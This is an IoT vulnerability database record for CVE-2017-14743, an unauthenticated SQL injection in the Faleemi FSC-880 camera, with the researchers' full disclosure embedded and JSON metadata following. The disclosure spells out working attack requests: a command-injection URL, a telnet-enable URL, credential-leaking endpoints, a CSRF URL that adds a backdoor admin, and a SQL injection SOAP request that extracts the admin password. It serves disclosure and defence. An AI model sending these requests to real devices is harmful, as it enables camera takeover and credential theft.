Search criteria
1 vulnerability found for fsc-880 by faleemi
VAR-201709-0746
Vulnerability from variot - Updated: 2025-04-20 23:04Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FaleemiFSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the FaleemiFSC-88000.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password. Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce
===
Timeline:
25 August 2017: the research was made
29 August 2017: an email was sent to the vendor, but with no answer
25 September 2017: public disclosure
26 September 2017: assigned CVE-2017a14743
https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/
Firmware: 00.01.01.0048P2 (2017-07-27)
This camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to camera via upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai.
CVE-2017a14743
Vulnerabilities
RCE
Works in stock firmware 00.01.01.0046 (E2017a03-**)
In the latest firmware (00.01.01.0048P2 (2017a07a27)) this is fixedaaaftp client is removed. It is not in processes and in file systemaaaostensibly because realization was altered.
Remote code execution in admin panel in GET parameters of Ft server scenario
http://IP/hy-cgi/ftp.cgi?cmd=setftpattr&ft_server=;RCE;&ftp_port==25&ft_username=&ft_password=&ft_dirname=
RCE2 (LAN)
During analysis and reversing of the firmware we found and undocumented functionaaait is possible to quite simply turn on telnet on the device:
Turn on telnet on port 23 http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus&enable=1
Check status http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus
Password protected Telnetaaasame as on web panel but with one exception: telnet is not connected to upnp. This suggests that port is not accessible outside LAN.
We have so far been unable to connect it because we have not found custom settings of doing so to upnp.
enable upnp: http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr&upnp_enable=1
upnp status: http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr&cmd=getupnpmap&cmd=getupnptmstatus Plaintext passwords
User passwords are stored on the device in plaintext format in several locations simultaneously:
/etc/webserver/lighttpd.user /mnt/mtd/db/ipcsys.db
Passwords are synchronised when changed. Information Disclosure
Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY
Device Info: http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo
WIFI credentials leak: http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr
Current user credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo
All users credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr
Third Party DDNS credentials leak: http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr
Manufactureras DDNS credentials leak: http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns
SMTP settings and credentials leak: http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr
FTP settings and credentials leak: http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr
CSRF
Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY
http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser&at_username=BACKDOOR_ADMIN&at_password=BACKDOOR_PASSWORD&at_rolename=admin
All changes in camera settings go through GET commands and donat use CSRF tokens.
The following functions can be executed remotely:
Configure Camera
Format SD card
Delete Logs
Steal image from camera
These actions and commands can be executed from admin browser. The indecent hacker only needs to lure the admin to their page.
Similar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html
And some more epic stuff Manufactureras DDNS enumeration
There are hardwired DDNS manufacturer settings found in the device. The device sends an http request using udp www.nwsvr1.com, and sends its internal address and admin web panel IP address to API http://www.nwsvr1.com/api/userip.asp
The device we researched has DDNS name 009lfld.nwsvr1.com. Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using a mask 00\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network.
We found a total of 758000 devices, which connected with this DDNS at least once in the past.
These are cameras by different manufacturers, that are somehow related to each other.
Around 3% of devices are in the network.. HK 18.41% US 12.72% DE 9.94% ES 6.77% FR 5.66% AR 5.09% GB 5.00% DK 3.79% IT 3.34% PL 3.04% MX 1.90% CN 1.55% VN 1.53% JP 1.53% HU 1.40% CL 1.27% BR 1.20% TH 1.19%
A little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF
A similar number (20a25 thousands devices are online) are vulnerable to auth bypass via sqli.
We have serious concerns that the DDNs password, which is hardwired into the device by the manufacturer is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name.
This raises the risk of the password being hijacked if the IP cards are switched on DDNS server, then redirected the admin using a camera with a DDNS name and grabs the password using his own authentication form.
Authorization bypass via blind SQLi
Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY
A device without authentication on web-port has an accessible endpoint by default /onvif/
ONVIF is an API standard for such devices. WSDL can be downloaded from the official website (www.onvif.org).
API uses authentication by tokens. Using this it is possible to obtain an admin password.
Example of the exploit:
/ https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce /
POST /onvif/device_service HTTP/1.1 Content-Type: application/soap+xml Content-Length: 1076 charset: utf-8 Host: 192.168.0.100 Connection: close
adfgadfhart' AND 1=2 UNION SELECT 1,'admin',(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFF SET 0),'remark'/* UHZj ybNG8udkMEflf+LjkCUmR88= fD nW+mqvvsID/WJGNR6QWQ== 1970-01-01T00:03:58 .674Z
To do this, the date and time set in the device are needed because they are used to build the password field of the authentication token.
We drafted this POC, which allows to extract from the camera a password and gain entry to the device using admin credentials.
This research was made by IoTSploit Team. Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/
If you have any active contact with Faleemi, please, show them this report and we are ready to coop
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0746",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fsc-880",
"scope": "eq",
"trust": 2.4,
"vendor": "faleemi",
"version": "00.01.01.0048p2"
},
{
"model": "fsc-880 00.01.01.0048p2",
"scope": null,
"trust": 0.6,
"vendor": "faleemi",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1229"
},
{
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:faleemi:fsc-880_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oleg Puzanov",
"sources": [
{
"db": "PACKETSTORM",
"id": "144392"
}
],
"trust": 0.1
},
"cve": "CVE-2017-14743",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2017-14743",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31141",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-105496",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2017-14743",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-14743",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-14743",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-31141",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-1229",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-105496",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "VULHUB",
"id": "VHN-105496"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1229"
},
{
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FaleemiFSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the FaleemiFSC-88000.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password. Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce \u003chttps://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce\u003e\n\n===\n\nTimeline:\n\n 25 August 2017: the research was made\n 29 August 2017: an email was sent to the vendor, but with no answer\n 25 September 2017: public disclosure\n 26 September 2017: assigned CVE-2017a14743\n\nhttps://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/\n\nFirmware: 00.01.01.0048P2 (2017-07-27)\n\nThis camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to camera via upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai. \n\n\nCVE-2017a14743\n\nVulnerabilities\n\nRCE\n\nWorks in stock firmware 00.01.01.0046 (E2017a03-**)\n\nIn the latest firmware (00.01.01.0048P2 (2017a07a27)) this is fixedaaaftp client is removed. It is not in processes and in file systemaaaostensibly because realization was altered. \n\nRemote code execution in admin panel in GET parameters of Ft server scenario\n\nhttp://IP/hy-cgi/ftp.cgi?cmd=setftpattr\u0026ft_server=;RCE;\u0026ftp_port==25\u0026ft_username=\u0026ft_password=\u0026ft_dirname=\n\nRCE2 (LAN)\n\nDuring analysis and reversing of the firmware we found and undocumented functionaaait is possible to quite simply turn on telnet on the device:\n\nTurn on telnet on port 23\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus\u0026enable=1\n\nCheck status\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus\n\nPassword protected Telnetaaasame as on web panel but with one exception: telnet is not connected to upnp. This suggests that port is not accessible outside LAN. \n\nWe have so far been unable to connect it because we have not found custom settings of doing so to upnp. \n\nenable upnp:\nhttp://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr\u0026upnp_enable=1\n\nupnp status:\nhttp://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr\u0026cmd=getupnpmap\u0026cmd=getupnptmstatus\nPlaintext passwords\n\nUser passwords are stored on the device in plaintext format in several locations simultaneously:\n\n/etc/webserver/lighttpd.user\n/mnt/mtd/db/ipcsys.db\n\nPasswords are synchronised when changed. \nInformation Disclosure\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nDevice Info:\nhttp://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo\n\nWIFI credentials leak:\nhttp://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr\n\nCurrent user credentials leak:\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo\n\nAll users credentials leak:\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr\n\nThird Party DDNS credentials leak:\nhttp://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr\n\nManufactureras DDNS credentials leak:\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns\n\nSMTP settings and credentials leak:\nhttp://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr\n\nFTP settings and credentials leak:\nhttp://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr\n\nCSRF\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nhttp://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot\nhttp://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog\nhttp://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=adduser\u0026at_username=BACKDOOR_ADMIN\u0026at_password=BACKDOOR_PASSWORD\u0026at_rolename=admin\n\nAll changes in camera settings go through GET commands and donat use CSRF tokens. \n\nThe following functions can be executed remotely:\n\n Configure Camera\n Format SD card\n Delete Logs\n Steal image from camera\n\nThese actions and commands can be executed from admin browser. The indecent hacker only needs to lure the admin to their page. \n\nSimilar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html\n\nAnd some more epic stuff\nManufactureras DDNS enumeration\n\nThere are hardwired DDNS manufacturer settings found in the device. The device sends an http request using udp www.nwsvr1.com, and sends its internal address and admin web panel IP address to API http://www.nwsvr1.com/api/userip.asp\n\nThe device we researched has DDNS name 009lfld.nwsvr1.com. Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using a mask 00\\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network. \n\nWe found a total of 758000 devices, which connected with this DDNS at least once in the past. \n\nThese are cameras by different manufacturers, that are somehow related to each other. \n\nAround 3% of devices are in the network.. \nHK 18.41%\nUS 12.72%\nDE 9.94%\nES 6.77%\nFR 5.66%\nAR 5.09%\nGB 5.00%\nDK 3.79%\nIT 3.34%\nPL 3.04%\nMX 1.90%\nCN 1.55%\nVN 1.53%\nJP 1.53%\nHU 1.40%\nCL 1.27%\nBR 1.20%\nTH 1.19%\n\nA little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF\n\nA similar number (20a25 thousands devices are online) are vulnerable to auth bypass via sqli. \n\nWe have serious concerns that the DDNs password, which is hardwired into the device by the manufacturer is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name. \n\nThis raises the risk of the password being hijacked if the IP cards are switched on DDNS server, then redirected the admin using a camera with a DDNS name and grabs the password using his own authentication form. \n\nAuthorization bypass via blind SQLi\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nA device without authentication on web-port has an accessible endpoint by default /onvif/\n\nONVIF is an API standard for such devices. WSDL can be downloaded from the official website (www.onvif.org). \n\nAPI uses authentication by tokens. Using this it is possible to obtain an admin password. \n\nExample of the exploit:\n\n\n/* https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce */\n\nPOST /onvif/device_service HTTP/1.1\nContent-Type: application/soap+xml\nContent-Length: 1076\ncharset: utf-8\nHost: 192.168.0.100\nConnection: close\n\n\u003cs:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\"\u003e\n\u003cs:Header\u003e\n\u003cSecurity s:mustUnderstand=\"1\" xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"\u003e\n\u003cUsernameToken\u003e\n\u003cUsername\u003eadfgadfhart\u0027 AND 1=2 UNION SELECT 1,\u0027admin\u0027,(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFF\nSET 0),\u0027remark\u0027/*\u003c/Username\u003e\n\u003cPassword Type=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest\"\u003eUHZj\nybNG8udkMEflf+LjkCUmR88=\u003c/Password\u003e\n\u003cNonce EncodingType=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary\"\u003efD\nnW+mqvvsID/WJGNR6QWQ==\u003c/Nonce\u003e\n\u003cCreated xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"\u003e1970-01-01T00:03:58\n.674Z\u003c/Created\u003e\n\u003c/UsernameToken\u003e\n\u003c/Security\u003e\n\u003c/s:Header\u003e\n\u003cs:Body xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\n\u003cGetDeviceInformation xmlns=\"http://www.onvif.org/ver10/device/wsdl\"/\u003e\n\u003c/s:Body\u003e\n\u003c/s:Envelope\u003e\n\n\nTo do this, the date and time set in the device are needed because they are used to build the password field of the authentication token. \n\nWe drafted this POC, which allows to extract from the camera a password and gain entry to the device using admin credentials. \n\nThis research was made by IoTSploit Team. Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/\n\nIf you have any active contact with Faleemi, please, show them this report and we are ready to coop",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14743"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "VULHUB",
"id": "VHN-105496"
},
{
"db": "PACKETSTORM",
"id": "144392"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-105496",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105496"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14743",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1229",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31141",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "144392",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-105496",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "VULHUB",
"id": "VHN-105496"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"db": "PACKETSTORM",
"id": "144392"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1229"
},
{
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"id": "VAR-201709-0746",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "VULHUB",
"id": "VHN-105496"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
}
]
},
"last_update_date": "2025-04-20T23:04:17.229000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.faleemi.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105496"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14743"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14743"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog"
},
{
"trust": 0.1,
"url": "https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr"
},
{
"trust": 0.1,
"url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#passworddigest\"\u003euhzj"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr\u0026cmd=getupnpmap\u0026cmd=getupnptmstatus"
},
{
"trust": 0.1,
"url": "http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema\"\u003e"
},
{
"trust": 0.1,
"url": "https://www.nwsvr1.com,"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus\u0026enable=1"
},
{
"trust": 0.1,
"url": "http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser\u0026at_username=backdoor_admin\u0026at_password=backdoor_password\u0026at_rolename=admin"
},
{
"trust": 0.1,
"url": "http://www.nwsvr1.com/api/userip.asp"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\""
},
{
"trust": 0.1,
"url": "https://www.onvif.org)."
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr\u0026upnp_enable=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog"
},
{
"trust": 0.1,
"url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#base64binary\"\u003efd"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr"
},
{
"trust": 0.1,
"url": "https://iotsploit.co/"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2003/05/soap-envelope\""
},
{
"trust": 0.1,
"url": "http://www.w3.org/2005/08/addressing\"\u003e"
},
{
"trust": 0.1,
"url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"\u003e"
},
{
"trust": 0.1,
"url": "http://www.onvif.org/ver10/device/wsdl\"/\u003e"
},
{
"trust": 0.1,
"url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"\u003e1970-01-01t00:03:58"
},
{
"trust": 0.1,
"url": "https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus"
},
{
"trust": 0.1,
"url": "http://ip/hy-cgi/ftp.cgi?cmd=setftpattr\u0026ft_server=;rce;\u0026ftp_port==25\u0026ft_username=\u0026ft_password=\u0026ft_dirname="
},
{
"trust": 0.1,
"url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "VULHUB",
"id": "VHN-105496"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"db": "PACKETSTORM",
"id": "144392"
},
{
